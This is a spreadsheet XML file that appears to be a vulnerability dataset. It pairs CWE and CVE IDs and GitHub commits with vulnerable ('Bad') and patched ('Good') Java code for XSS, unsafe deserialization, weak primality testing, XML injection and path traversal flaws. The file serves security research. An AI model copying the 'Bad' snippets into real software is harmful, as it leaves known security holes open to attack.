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Research\ArtifactEvolution\gitHubScrap\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{53FD218A-FE7D-4843-B9D7-D5EED474ADE7}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="-108" yWindow="-108" windowWidth="23256" windowHeight="11964"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O2" i="1"/>
</calcChain>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="4132" uniqueCount="1619">
  <si>
    <t>CWE-ID</t>
  </si>
  <si>
    <t>CVE-ID</t>
  </si>
  <si>
    <t>Git Link</t>
  </si>
  <si>
    <t>File Name</t>
  </si>
  <si>
    <t>commit</t>
  </si>
  <si>
    <t>Language</t>
  </si>
  <si>
    <t>Bad</t>
  </si>
  <si>
    <t>Good</t>
  </si>
  <si>
    <t>Commit Message</t>
  </si>
  <si>
    <t>CWE Name</t>
  </si>
  <si>
    <t>CWE Description</t>
  </si>
  <si>
    <t>CWE Extended Description</t>
  </si>
  <si>
    <t>CWE-79</t>
  </si>
  <si>
    <t>CVE-2018-1000129</t>
  </si>
  <si>
    <t>https://github.com/rhuss/jolokia/commit/5895d5c137c335e6b473e9dcb9baf748851bbc5f#diff-f19898247eddb55de6400489bff748ad</t>
  </si>
  <si>
    <t>AgentServlet.java</t>
  </si>
  <si>
    <t>5895d5c137c335e6b473e9dcb9baf748851bbc5f#diff-f19898247eddb55de6400489bff748ad</t>
  </si>
  <si>
    <t>java</t>
  </si>
  <si>
    <t xml:space="preserve">            json = requestHandler.handleThrowable(
    // Extract mime type for response (if not JSONP)
    private String getMimeType(HttpServletRequest pReq) {
        String requestMimeType = pReq.getParameter(ConfigKey.MIME_TYPE.getKeyValue());
        if (requestMimeType != null) {
            return requestMimeType;
        }
        return configMimeType;
    }
        setContentType(pResp, callback != null ? "text/javascript" : getMimeType(pReq));
</t>
  </si>
  <si>
    <t xml:space="preserve">            // If a callback is given, check this is a valid javascript function name
            validateCallbackIfGiven(pReq);
            try {
                json = requestHandler.handleThrowable(
            } catch (Throwable exp2) {
                exp2.printStackTrace();
            }
        setContentType(pResp,
                       MimeTypeUtil.getResponseMimeType(
                           pReq.getParameter(ConfigKey.MIME_TYPE.getKeyValue()),
                           configMimeType, callback
                                                       ));
    private void validateCallbackIfGiven(HttpServletRequest pReq) {
        String callback = pReq.getParameter(ConfigKey.CALLBACK.getKeyValue());
        if (callback != null &amp;&amp; !MimeTypeUtil.isValidCallback(callback)) {
            throw new IllegalArgumentException("Invalid callback name given, which must be a valid javascript function name");
        }
    }
</t>
  </si>
  <si>
    <t>fix: Verify a given 'mimeType' and/or 'callback' request parameterSo that only fixed values are possible, in order to avoid XSS attack
vectors.</t>
  </si>
  <si>
    <t>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')</t>
  </si>
  <si>
    <t>The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.</t>
  </si>
  <si>
    <t>Cross-site scripting (XSS) vulnerabilities occur when: Untrusted data enters a web application, typically from a web request. The web application dynamically generates a web page that contains this untrusted data. During page generation, the application does not prevent the data from containing content that is executable by a web browser, such as JavaScript, HTML tags, HTML attributes, mouse events, Flash, ActiveX, etc. A victim visits the generated web page through a web browser, which contains malicious script that was injected using the untrusted data. Since the script comes from a web page that was sent by the web server, the victim's web browser executes the malicious script in the context of the web server's domain. This effectively violates the intention of the web browser's same-origin policy, which states that scripts in one domain should not be able to access resources or run code in a different domain. There are three main kinds of XSS: Type 1: Reflected XSS (or Non-Persistent) - The server reads data directly from the HTTP request and reflects it back in the HTTP response. Reflected XSS exploits occur when an attacker causes a victim to supply dangerous content to a vulnerable web application, which is then reflected back to the victim and executed by the web browser. The most common mechanism for delivering malicious content is to include it as a parameter in a URL that is posted publicly or e-mailed directly to the victim. URLs constructed in this manner constitute the core of many phishing schemes, whereby an attacker convinces a victim to visit a URL that refers to a vulnerable site. After the site reflects the attacker's content back to the victim, the content is executed by the victim's browser. Type 2: Stored XSS (or Persistent) - The application stores dangerous data in a database, message forum, visitor log, or other trusted data store. At a later time, the dangerous data is subsequently read back into the application and included in dynamic content. From an attacker's perspective, the optimal place to inject malicious content is in an area that is displayed to either many users or particularly interesting users. Interesting users typically have elevated privileges in the application or interact with sensitive data that is valuable to the attacker. If one of these users executes malicious content, the attacker may be able to perform privileged operations on behalf of the user or gain access to sensitive data belonging to the user. For example, the attacker might inject XSS into a log message, which might not be handled properly when an administrator views the logs. Type 0: DOM-Based XSS - In DOM-based XSS, the client performs the injection of XSS into the page; in the other types, the server performs the injection. DOM-based XSS generally involves server-controlled, trusted script that is sent to the client, such as Javascript that performs sanity checks on a form before the user submits it. If the server-supplied script processes user-supplied data and then injects it back into the web page (such as with dynamic HTML), then DOM-based XSS is possible. Once the malicious script is injected, the attacker can perform a variety of malicious activities. The attacker could transfer private information, such as cookies that may include session information, from the victim's machine to the attacker. The attacker could send malicious requests to a web site on behalf of the victim, which could be especially dangerous to the site if the victim has administrator privileges to manage that site. Phishing attacks could be used to emulate trusted web sites and trick the victim into entering a password, allowing the attacker to compromise the victim's account on that web site. Finally, the script could exploit a vulnerability in the web browser itself possibly taking over the victim's machine, sometimes referred to as drive-by hacking. In many cases, the attack can be launched without the victim even being aware of it. Even with careful users, attackers frequently use a variety of methods to encode the malicious portion of the attack, such as URL encoding or Unicode, so the request looks less suspicious.</t>
  </si>
  <si>
    <t>MimeTypeUtil.java</t>
  </si>
  <si>
    <t xml:space="preserve">package org.jolokia.util;
import java.util.regex.Pattern;
/**
 * Helper class for handling proper response mime types
 *
 * @author roland
 * @since 24.01.18
 */
public class MimeTypeUtil {
    /**
     * Extract the response mime type. This value is calculated for different situations:
     * &lt;p&gt;
     * &lt;ul&gt;
     * &lt;li&gt;If a callback is given and its valid, the mime type is "text/javascript"&lt;/li&gt;
     * &lt;li&gt;Otherwise:
     * &lt;ul&gt;
     * &lt;li&gt;If a valid mimeType is given in the request ("text/plain", "application/json"), then this
     * mimet type is returned&lt;/li&gt;
     * &lt;li&gt;If another mimeType is given, then "text/plain" is used&lt;/li&gt;
     * &lt;li&gt;If no mimeType is given then a given default mime type is used, but also sanitized
     * as described above&lt;/li&gt;
     * &lt;/ul&gt;
     * &lt;/li&gt;
     * &lt;/ul&gt;
     *
     * @param pRequestMimeType the mimetype given in the request
     * @param defaultMimeType  the default mime type to use if none is given in the request
     * @param pCallback        a callback given (can be null)
     */
    public static String getResponseMimeType(String pRequestMimeType, String defaultMimeType, String pCallback) {
        // For a valid given callback, return "text/javascript" for proper inclusion
        if (pCallback != null &amp;&amp; isValidCallback(pCallback)) {
            return "text/javascript";
        }
        // Pick up mime time from request, but sanitize
        if (pRequestMimeType != null) {
            return sanitize(pRequestMimeType);
        }
        // Use the given default mime type (possibly picked up from a configuration)
        return sanitize(defaultMimeType);
    }
    private static String sanitize(String mimeType) {
        for (String accepted : new String[]{
            "application/json",
            "text/plain"
        }) {
            if (accepted.equalsIgnoreCase(mimeType)) {
                return accepted;
            }
        }
        return "text/plain";
    }
    /**
     * Check that a callback matches a javascript function name. The argument must be not null
     *
     * @param pCallback callback to verify
     * @return true if valud, false otherwise
     */
    public static boolean isValidCallback(String pCallback) {
        Pattern validJavaScriptFunctionNamePattern =
            Pattern.compile("^[$A-Z_][0-9A-Z_$]*$", Pattern.CASE_INSENSITIVE);
        return validJavaScriptFunctionNamePattern.matcher(pCallback).matches();
    }
}
</t>
  </si>
  <si>
    <t>JolokiaHttpHandler.java</t>
  </si>
  <si>
    <t xml:space="preserve">            String callback = pParsedUri.getParameter(ConfigKey.CALLBACK.getKeyValue());
            IoUtil.streamResponseAndClose(writer, pJson, callback);
                String content = callback == null ? json : callback + "(" + json + ");";
        if (pParsedUri.getParameter(ConfigKey.CALLBACK.getKeyValue()) != null) {
            return "text/javascript";
        } else {
            String mimeType = pParsedUri.getParameter(ConfigKey.MIME_TYPE.getKeyValue());
            if (mimeType != null) {
                return mimeType;
            }
            mimeType = configuration.get(ConfigKey.MIME_TYPE);
            return mimeType != null ? mimeType : ConfigKey.MIME_TYPE.getDefaultValue();
        }
</t>
  </si>
  <si>
    <t xml:space="preserve">            // If a callback is given, check this is a valid javascript function name
            validateCallbackIfGiven(parsedUri);
    private void validateCallbackIfGiven(ParsedUri pUri) {
        String callback = pUri.getParameter(ConfigKey.CALLBACK.getKeyValue());
        if (callback != null &amp;&amp; !MimeTypeUtil.isValidCallback(callback)) {
            throw new IllegalArgumentException("Invalid callback name given, which must be a valid javascript function name");
        }
    }
            String callback = pParsedUri.getParameter(ConfigKey.CALLBACK.getKeyValue());
            IoUtil.streamResponseAndClose(writer, pJson, callback != null &amp;&amp; MimeTypeUtil.isValidCallback(callback) ? callback : null);
                String content = callback != null &amp;&amp; MimeTypeUtil.isValidCallback(callback) ? callback + "(" + json + ");" : json;
        return MimeTypeUtil.getResponseMimeType(
            pParsedUri.getParameter(ConfigKey.MIME_TYPE.getKeyValue()),
            configuration.get(ConfigKey.MIME_TYPE),
            pParsedUri.getParameter(ConfigKey.CALLBACK.getKeyValue()));
</t>
  </si>
  <si>
    <t>CWE-327</t>
  </si>
  <si>
    <t>CVE-2018-1000180</t>
  </si>
  <si>
    <t>https://github.com/bcgit/bc-java/commit/22467b6e8fe19717ecdf201c0cf91bacf04a55ad</t>
  </si>
  <si>
    <t>RSAKeyPairGenerator.java</t>
  </si>
  <si>
    <t>22467b6e8fe19717ecdf201c0cf91bacf04a55ad</t>
  </si>
  <si>
    <t xml:space="preserve">        int iterations = getNumberOfIterations(bitlength, param.getCertainty());
            if (!isProbablePrime(p, iterations))
    protected boolean isProbablePrime(BigInteger x, int iterations)
</t>
  </si>
  <si>
    <t xml:space="preserve">            if (!isProbablePrime(p))
    protected boolean isProbablePrime(BigInteger x)
        int iterations = getNumberOfIterations(x.bitLength(), param.getCertainty());
</t>
  </si>
  <si>
    <t>BJA-694 minor tweak to avoid method signature change</t>
  </si>
  <si>
    <t>Use of a Broken or Risky Cryptographic Algorithm</t>
  </si>
  <si>
    <t>The use of a broken or risky cryptographic algorithm is an unnecessary risk that may result in the exposure of sensitive information.</t>
  </si>
  <si>
    <t>The use of a non-standard algorithm is dangerous because a determined attacker may be able to break the algorithm and compromise whatever data has been protected. Well-known techniques may exist to break the algorithm.</t>
  </si>
  <si>
    <t>https://github.com/bcgit/bc-java/commit/73780ac522b7795fc165630aba8d5f5729acc839</t>
  </si>
  <si>
    <t>73780ac522b7795fc165630aba8d5f5729acc839</t>
  </si>
  <si>
    <t xml:space="preserve">    private int iterations;
        this.iterations = getNumberOfIterations(this.param.getStrength(), this.param.getCertainty());
            if (!isProbablePrime(p))
    protected boolean isProbablePrime(BigInteger x)
</t>
  </si>
  <si>
    <t>BJA-694 cleaned up primality test</t>
  </si>
  <si>
    <t>CWE-502</t>
  </si>
  <si>
    <t>CVE-2018-1000613</t>
  </si>
  <si>
    <t>https://github.com/bcgit/bc-java/commit/4092ede58da51af9a21e4825fbad0d9a3ef5a223#diff-2c06e2edef41db889ee14899e12bd574</t>
  </si>
  <si>
    <t>GMSSKeyPairGenerator.java</t>
  </si>
  <si>
    <t>4092ede58da51af9a21e4825fbad0d9a3ef5a223#diff-2c06e2edef41db889ee14899e12bd574</t>
  </si>
  <si>
    <t xml:space="preserve">            GMSSRootCalc tree = new GMSSRootCalc(this.heightOfTrees[h], this.K[h], digestProvider);
            try
            {
                // on lowest layer no lower root is available, so just call
                // the method with null as first parameter
                if (h == numLayer - 1)
                {
                    tree = this.generateCurrentAuthpathAndRoot(null, currentStack[h], seeds[h], h);
                }
                else
                // otherwise call the method with the former computed root
                // value
                {
                    tree = this.generateCurrentAuthpathAndRoot(currentRoots[h + 1], currentStack[h], seeds[h], h);
                }
            catch (Exception e1)
                e1.printStackTrace();
</t>
  </si>
  <si>
    <t xml:space="preserve">            GMSSRootCalc tree;
            // on lowest layer no lower root is available, so just call
            // the method with null as first parameter
            if (h == numLayer - 1)
            {
                tree = this.generateCurrentAuthpathAndRoot(null, currentStack[h], seeds[h], h);
            else
            // otherwise call the method with the former computed root
            // value
                tree = this.generateCurrentAuthpathAndRoot(currentRoots[h + 1], currentStack[h], seeds[h], h);
</t>
  </si>
  <si>
    <t>added additional checking to XMSS BDS tree parsing. Failures now most……ly cause IOException</t>
  </si>
  <si>
    <t>Deserialization of Untrusted Data</t>
  </si>
  <si>
    <t>The application deserializes untrusted data without sufficiently verifying that the resulting data will be valid.</t>
  </si>
  <si>
    <t>It is often convenient to serialize objects for communication or to save them for later use. However, deserialized data or code can often be modified without using the provided accessor functions if it does not use cryptography to protect itself. Furthermore, any cryptography would still be client-side security -- which is a dangerous security assumption. Data that is untrusted can not be trusted to be well-formed. When developers place no restrictions on gadget chains, or series of instances and method invocations that can self-execute during the deserialization process (i.e., before the object is returned to the caller), it is sometimes possible for attackers to leverage them to perform unauthorized actions, like generating a shell.</t>
  </si>
  <si>
    <t>RainbowParameters.java</t>
  </si>
  <si>
    <t xml:space="preserve">        try
        {
            checkParams();
        }
        catch (Exception e)
        {
            e.printStackTrace();
        }
        throws Exception
            throw new Exception("no layers defined.");
                    throw new Exception(
            throw new Exception(
</t>
  </si>
  <si>
    <t xml:space="preserve">        checkParams();
            throw new IllegalArgumentException("no layers defined.");
                    throw new IllegalArgumentException(
            throw new IllegalArgumentException(
</t>
  </si>
  <si>
    <t>XMSSMTPrivateKeyParameters.java</t>
  </si>
  <si>
    <t xml:space="preserve">            BDSStateMap bdsImport = null;
                bdsImport = (BDSStateMap)XMSSUtil.deserialize(bdsStateBinary);
                e.printStackTrace();
                e.printStackTrace();
            bdsImport.setXMSS(builder.xmss);
            bdsState = bdsImport;
        byte[] bdsStateOut = null;
            bdsStateOut = XMSSUtil.serialize(bdsState);
            e.printStackTrace();
            throw new RuntimeException("error serializing bds state");
        return Arrays.concatenate(out, bdsStateOut);
</t>
  </si>
  <si>
    <t xml:space="preserve">                BDSStateMap bdsImport = (BDSStateMap)XMSSUtil.deserialize(bdsStateBinary, BDSStateMap.class);
                bdsImport.setXMSS(builder.xmss);
                bdsState = bdsImport;
                throw new IllegalArgumentException(e.getMessage(), e);
                throw new IllegalArgumentException(e.getMessage(), e);
            return Arrays.concatenate(out, XMSSUtil.serialize(bdsState));
            throw new IllegalStateException("error serializing bds state: " + e.getMessage(), e);
</t>
  </si>
  <si>
    <t>XMSSPrivateKeyParameters.java</t>
  </si>
  <si>
    <t xml:space="preserve">            BDS bdsImport = null;
                bdsImport = (BDS)XMSSUtil.deserialize(bdsStateBinary);
                e.printStackTrace();
                e.printStackTrace();
            }
            bdsImport.setXMSS(builder.xmss);
            bdsImport.validate();
            if (bdsImport.getIndex() != index)
            {
                throw new IllegalStateException("serialized BDS has wrong index");
            bdsState = bdsImport;
</t>
  </si>
  <si>
    <t xml:space="preserve">                BDS bdsImport = (BDS)XMSSUtil.deserialize(bdsStateBinary, BDS.class);
                bdsImport.setXMSS(builder.xmss);
                bdsImport.validate();
                if (bdsImport.getIndex() != index)
                {
                    throw new IllegalStateException("serialized BDS has wrong index");
                }
                bdsState = bdsImport;
                throw new IllegalArgumentException(e.getMessage(), e);
                throw new IllegalArgumentException(e.getMessage(), e);
</t>
  </si>
  <si>
    <t>XMSSUtil.java</t>
  </si>
  <si>
    <t xml:space="preserve">    public static Object deserialize(byte[] data)
        return is.readObject();
</t>
  </si>
  <si>
    <t xml:space="preserve">    public static Object deserialize(byte[] data, Class clazz)
        Object obj = is.readObject();
        if (is.available() != 0)
        {
            throw new IOException("unexpected data found at end of ObjectInputStream");
        }
        if (clazz.isInstance(obj))
        {
            return obj;
        }
        else
        {
            throw new IOException("unexpected class found in ObjectInputStream");
        }
</t>
  </si>
  <si>
    <t>GF2nField.java</t>
  </si>
  <si>
    <t xml:space="preserve">            try
            {
                a[i] = new GF2Polynomial(matrix[i]);
                inv[i] = new GF2Polynomial(mDegree);
                inv[i].setBit(mDegree - 1 - i);
            }
            catch (RuntimeException BDNEExc)
            {
                BDNEExc.printStackTrace();
            }
</t>
  </si>
  <si>
    <t xml:space="preserve">            a[i] = new GF2Polynomial(matrix[i]);
            inv[i] = new GF2Polynomial(mDegree);
            inv[i].setBit(mDegree - 1 - i);
</t>
  </si>
  <si>
    <t>BCXMSSMTPrivateKey.java</t>
  </si>
  <si>
    <t xml:space="preserve">                keyBuilder.withBDSState((BDSStateMap)XMSSUtil.deserialize(xmssMtPrivateKey.getBdsState()));
</t>
  </si>
  <si>
    <t xml:space="preserve">                keyBuilder.withBDSState((BDSStateMap)XMSSUtil.deserialize(xmssMtPrivateKey.getBdsState(), BDSStateMap.class));
</t>
  </si>
  <si>
    <t>BCXMSSPrivateKey.java</t>
  </si>
  <si>
    <t xml:space="preserve">                keyBuilder.withBDSState((BDS)XMSSUtil.deserialize(xmssPrivateKey.getBdsState()));
</t>
  </si>
  <si>
    <t xml:space="preserve">                keyBuilder.withBDSState((BDS)XMSSUtil.deserialize(xmssPrivateKey.getBdsState(), BDS.class));
</t>
  </si>
  <si>
    <t>https://github.com/bcgit/bc-java/commit/cd98322b171b15b3f88c5ec871175147893c31e6#diff-148a6c098af0199192d6aede960f45dc</t>
  </si>
  <si>
    <t>cd98322b171b15b3f88c5ec871175147893c31e6#diff-148a6c098af0199192d6aede960f45dc</t>
  </si>
  <si>
    <t xml:space="preserve">import java.util.HashSet;
import java.util.Set;
        private static final Set&lt;String&gt; components = new HashSet&lt;&gt;();
        static
        {
            components.add("java.util.TreeMap");
            components.add("java.lang.Integer");
            components.add("java.lang.Number");
            components.add("org.bouncycastle.pqc.crypto.xmss.BDS");
            components.add("java.util.ArrayList");
            components.add("org.bouncycastle.pqc.crypto.xmss.XMSSNode");
            components.add("[B");
            components.add("java.util.LinkedList");
            components.add("java.util.Stack");
            components.add("java.util.Vector");
            components.add("[Ljava.lang.Object;");
            components.add("org.bouncycastle.pqc.crypto.xmss.BDSTreeHash");
        }
            else
            {
                if (!components.contains(desc.getName()))
                {
                    throw new InvalidClassException(
                          "unexpected class: ", desc.getName());
                }
            }
</t>
  </si>
  <si>
    <t>added full filtering for BDS data.</t>
  </si>
  <si>
    <t>CWE-91</t>
  </si>
  <si>
    <t>CVE-2018-1000632</t>
  </si>
  <si>
    <t>https://github.com/dom4j/dom4j/commit/e598eb43d418744c4dbf62f647dd2381c9ce9387</t>
  </si>
  <si>
    <t>Namespace.java</t>
  </si>
  <si>
    <t>e598eb43d418744c4dbf62f647dd2381c9ce9387</t>
  </si>
  <si>
    <t xml:space="preserve">        if (!this.prefix.isEmpty()) {
            QName.validateNCName(this.prefix);
        }
</t>
  </si>
  <si>
    <t>#48 Validate QName inputs - throw IllegalArgumentException when quali……fied name contains disallowed character.</t>
  </si>
  <si>
    <t>XML Injection (aka Blind XPath Injection)</t>
  </si>
  <si>
    <t>The software does not properly neutralize special elements that are used in XML, allowing attackers to modify the syntax, content, or commands of the XML before it is processed by an end system.</t>
  </si>
  <si>
    <t>Within XML, special elements could include reserved words or characters such as &lt;, &gt;, , and &amp;, which could then be used to add new data or modify XML syntax.</t>
  </si>
  <si>
    <t>QName.java</t>
  </si>
  <si>
    <t xml:space="preserve">import java.util.regex.Pattern;
 * @author Filip Jirsák
    /**
     * {@code NameStartChar} without colon.
     *
     * &lt;pre&gt;NameStartChar	::=	":" | [A-Z] | "_" | [a-z] | [#xC0-#xD6] | [#xD8-#xF6] | [#xF8-#x2FF] | [#x370-#x37D] | [#x37F-#x1FFF] | [#x200C-#x200D] | [#x2070-#x218F] | [#x2C00-#x2FEF] | [#x3001-#xD7FF] | [#xF900-#xFDCF] | [#xFDF0-#xFFFD] | [#x10000-#xEFFFF]&lt;/pre&gt;
     *
     * @see &lt;a href="https://www.w3.org/TR/xml/#sec-common-syn"&gt;XML 1.0 – 2.3 Common Syntactic Constructs&lt;/a&gt;
     * @see &lt;a href="https://www.w3.org/TR/2006/REC-xml11-20060816/#sec-common-syn"&gt;XML 1.1 – 2.3 Common Syntactic Constructs&lt;/a&gt;
     */
    private static final String NAME_START_CHAR = "_A-Za-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD";
    /**
     * {@code NameChar} without colon.
     *
     * &lt;pre&gt;NameChar	::=	NameStartChar | "-" | "." | [0-9] | #xB7 | [#x0300-#x036F] | [#x203F-#x2040]&lt;/pre&gt;
     *
     * @see &lt;a href="https://www.w3.org/TR/xml/#sec-common-syn"&gt;XML 1.0 – 2.3 Common Syntactic Constructs&lt;/a&gt;
     * @see &lt;a href="https://www.w3.org/TR/2006/REC-xml11-20060816/#sec-common-syn"&gt;XML 1.1 – 2.3 Common Syntactic Constructs&lt;/a&gt;
     */
    private static final String NAME_CHAR = NAME_START_CHAR + "-.0-9\u00B7\u0300-\u036F\u203F-\u2040";
    /**
     * {@code NCName}
     *
     * &lt;pre&gt;
     * NCName		::=	NCNameStartChar NCNameChar*	(An XML Name, minus the ":")
     * NCNameChar	::=	NameChar -':'
     * NCNameStartChar	::=	NameStartChar -':'
     * &lt;/pre&gt;
     *
     * @see &lt;a href="https://www.w3.org/TR/xml-names/#ns-qualnames"&gt;Namespaces in XML 1.0 – 4 Qualified Names&lt;/a&gt;
     * @see &lt;a href="https://www.w3.org/TR/2006/REC-xml-names11-20060816/#ns-qualnames"&gt;Namespaces in XML 1.1 – 4 Qualified Names&lt;/a&gt;
     */
    private static final String NCNAME = "["+NAME_START_CHAR+"]["+NAME_CHAR+"]*";
    /**
     * Regular expression for {@code Name} (with colon).
     *
     * &lt;pre&gt;Name	::=	NameStartChar (NameChar)*&lt;/pre&gt;
     *
     * @see &lt;a href="https://www.w3.org/TR/xml/#sec-common-syn"&gt;XML 1.0 – 2.3 Common Syntactic Constructs&lt;/a&gt;
     * @see &lt;a href="https://www.w3.org/TR/2006/REC-xml11-20060816/#sec-common-syn"&gt;XML 1.1 – 2.3 Common Syntactic Constructs&lt;/a&gt;
     */
    private static final Pattern RE_NAME = Pattern.compile("[:"+NAME_START_CHAR+"][:"+NAME_CHAR+"]*");
    /**
     * Regular expression for {@code NCName}.
     *
     * &lt;pre&gt;
     * NCName		::=	NCNameStartChar NCNameChar*	(An XML Name, minus the ":")
     * NCNameChar	::=	NameChar -':'
     * NCNameStartChar	::=	NameStartChar -':'
     * &lt;/pre&gt;
     *
     * @see &lt;a href="https://www.w3.org/TR/xml-names/#ns-qualnames"&gt;Namespaces in XML 1.0 – 4 Qualified Names&lt;/a&gt;
     * @see &lt;a href="https://www.w3.org/TR/2006/REC-xml-names11-20060816/#ns-qualnames"&gt;Namespaces in XML 1.1 – 4 Qualified Names&lt;/a&gt;
     */
    private static final Pattern RE_NCNAME = Pattern.compile(NCNAME);
    /**
     * Regular expression for {@code QName}.
     *
     * &lt;pre&gt;
     * QName		::=	PrefixedName | UnprefixedName
     * PrefixedName	::=	Prefix ':' LocalPart
     * UnprefixedName	::=	LocalPart
     * Prefix		::=	NCName
     * LocalPart	::=	NCName
     * &lt;/pre&gt;
     *
     * @see &lt;a href="https://www.w3.org/TR/xml-names/#ns-qualnames"&gt;Namespaces in XML 1.0 – 4 Qualified Names&lt;/a&gt;
     * @see &lt;a href="https://www.w3.org/TR/2006/REC-xml-names11-20060816/#ns-qualnames"&gt;Namespaces in XML 1.1 – 4 Qualified Names&lt;/a&gt;
     */
    private static final Pattern RE_QNAME = Pattern.compile("(?:"+NCNAME+":)?"+NCNAME);
        if (this.namespace.equals(Namespace.NO_NAMESPACE)) {
            validateName(this.name);
        } else {
            validateNCName(this.name);
        }
        validateNCName(this.name);
        validateQName(this.qualifiedName);
    private static void validateName(String name) {
        if (!RE_NAME.matcher(name).matches()) {
            throw new IllegalArgumentException(String.format("Illegal character in name: '%s'.", name));
        }
    }
    protected static void validateNCName(String ncname) {
        if (!RE_NCNAME.matcher(ncname).matches()) {
            throw new IllegalArgumentException(String.format("Illegal character in local name: '%s'.", ncname));
        }
    }
    private static void validateQName(String qname) {
        if (!RE_QNAME.matcher(qname).matches()) {
            throw new IllegalArgumentException(String.format("Illegal character in qualified name: '%s'.", qname));
        }
    }
</t>
  </si>
  <si>
    <t>QNameCache.java</t>
  </si>
  <si>
    <t xml:space="preserve">        } else if (index == 0){
            throw new IllegalArgumentException("Qualified name cannot start with ':'.");
</t>
  </si>
  <si>
    <t>CWE-22</t>
  </si>
  <si>
    <t>CVE-2018-1000850</t>
  </si>
  <si>
    <t>https://github.com/square/retrofit/commit/b9a7f6ad72073ddd40254c0058710e87a073047d#diff-943ec7ed35e68201824904d1dc0ec982</t>
  </si>
  <si>
    <t>RequestBuilder.java</t>
  </si>
  <si>
    <t>b9a7f6ad72073ddd40254c0058710e87a073047d#diff-943ec7ed35e68201824904d1dc0ec982</t>
  </si>
  <si>
    <t xml:space="preserve">    relativeUrl = relativeUrl.replace("{" + name + "}", canonicalizeForPath(value, encoded));
</t>
  </si>
  <si>
    <t xml:space="preserve">import java.util.regex.Pattern;
  /**
   * Matches strings that contain {@code .} or {@code ..} as a complete path segment. This also
   * matches dots in their percent-encoded form, {@code %2E}.
   *
   * &lt;p&gt;It is okay to have these strings within a larger path segment (like {@code a..z} or {@code
   * index.html}) but when alone they have a special meaning. A single dot resolves to no path
   * segment so {@code /one/./three/} becomes {@code /one/three/}. A double-dot pops the preceding
   * directory, so {@code /one/../three/} becomes {@code /three/}.
   *
   * &lt;p&gt;We forbid these in Retrofit paths because they're likely to have the unintended effect.
   * For example, passing {@code ..} to {@code DELETE /account/book/{isbn}/} yields {@code DELETE
   * /account/}.
   */
  private static final Pattern PATH_TRAVERSAL = Pattern.compile("(.*/)?(\\.|%2e|%2E){1,2}(/.*)?");
    String replacement = canonicalizeForPath(value, encoded);
    String newRelativeUrl = relativeUrl.replace("{" + name + "}", replacement);
    if (PATH_TRAVERSAL.matcher(newRelativeUrl).matches()) {
      throw new IllegalArgumentException(
          "@Path parameters shouldn't perform path traversal ('.' or '..'): " + value);
    }
    relativeUrl = newRelativeUrl;
</t>
  </si>
  <si>
    <t>Forbid path traversal ('.' and '..') as @path parameters.They're likely to have the unintended effect. For example, passing ".."
to @delete /account/book/{isbn}/ yields @delete /account/.</t>
  </si>
  <si>
    <t>Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')</t>
  </si>
  <si>
    <t>The software uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the software does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.</t>
  </si>
  <si>
    <t>Many file operations are intended to take place within a restricted directory. By using special elements such as .. and / separators, attackers can escape outside of the restricted location to access files or directories that are elsewhere on the system. One of the most common special elements is the ../ sequence, which in most modern operating systems is interpreted as the parent directory of the current location. This is referred to as relative path traversal. Path traversal also covers the use of absolute pathnames such as /usr/local/bin, which may also be useful in accessing unexpected files. This is referred to as absolute path traversal. In many programming languages, the injection of a null byte (the 0 or NUL) may allow an attacker to truncate a generated filename to widen the scope of attack. For example, the software may add .txt to any pathname, thus limiting the attacker to text files, but a null injection may effectively remove this restriction.</t>
  </si>
  <si>
    <t>CVE-2018-1002200</t>
  </si>
  <si>
    <t>https://github.com/codehaus-plexus/plexus-archiver/commit/f8f4233508193b70df33759ae9dc6154d69c2ea8</t>
  </si>
  <si>
    <t>AbstractUnArchiver.java</t>
  </si>
  <si>
    <t>f8f4233508193b70df33759ae9dc6154d69c2ea8</t>
  </si>
  <si>
    <t xml:space="preserve">        // Make sure that the resolved path of the extracted file doesn't escape the destination directory
        String canonicalDirPath = dir.getCanonicalPath();
        String canonicalDestPath = f.getCanonicalPath();
        if ( !canonicalDestPath.startsWith( canonicalDirPath ) )
        {
            throw new ArchiverException( "Entry is outside of the target directory (" + entryName + ")" );
        }
</t>
  </si>
  <si>
    <t>Merge pull request #87 from odinn1984/fix/fail_on_outside_target_filesfix: fail when trying to extract outside of dest dir</t>
  </si>
  <si>
    <t>CVE-2018-1002201</t>
  </si>
  <si>
    <t>https://github.com/zeroturnaround/zt-zip/commit/759b72f33bc8f4d69f84f09fcb7f010ad45d6fff</t>
  </si>
  <si>
    <t>ZipUtil.java</t>
  </si>
  <si>
    <t>759b72f33bc8f4d69f84f09fcb7f010ad45d6fff</t>
  </si>
  <si>
    <t xml:space="preserve">        /* If we see the relative traversal string of ".." we need to make sure
         * that the outputdir + name doesn't leave the outputdir. See
         * DirectoryTraversalMaliciousTest for details.
         */
        if (name.indexOf("..") != -1 &amp;&amp; !file.getCanonicalPath().startsWith(outputDir.getCanonicalPath())) {
          throw new ZipException("The file "+name+" is trying to leave the target output directory of "+outputDir+". Ignoring this file.");
        }
          /* If we see the relative traversal string of ".." we need to make sure
           * that the outputdir + name doesn't leave the outputdir. See
           * DirectoryTraversalMaliciousTest for details.
           */
          if (name.indexOf("..") != -1 &amp;&amp; !destFile.getCanonicalPath().startsWith(outputDir.getCanonicalPath())) {
            throw new ZipException("The file "+name+" is trying to leave the target output directory of "+outputDir+". Ignoring this file.");
          }
          /* If we see the relative traversal string of ".." we need to make sure
           * that the outputdir + name doesn't leave the outputdir. See
           * DirectoryTraversalMaliciousTest for details.
           */
          if (name.indexOf("..") != -1 &amp;&amp; !destFile.getCanonicalPath().startsWith(outputDir.getCanonicalPath())) {
            throw new ZipException("The file "+name+" is trying to leave the target output directory of "+outputDir+". Ignoring this file.");
          }
        /* If we see the relative traversal string of ".." we need to make sure
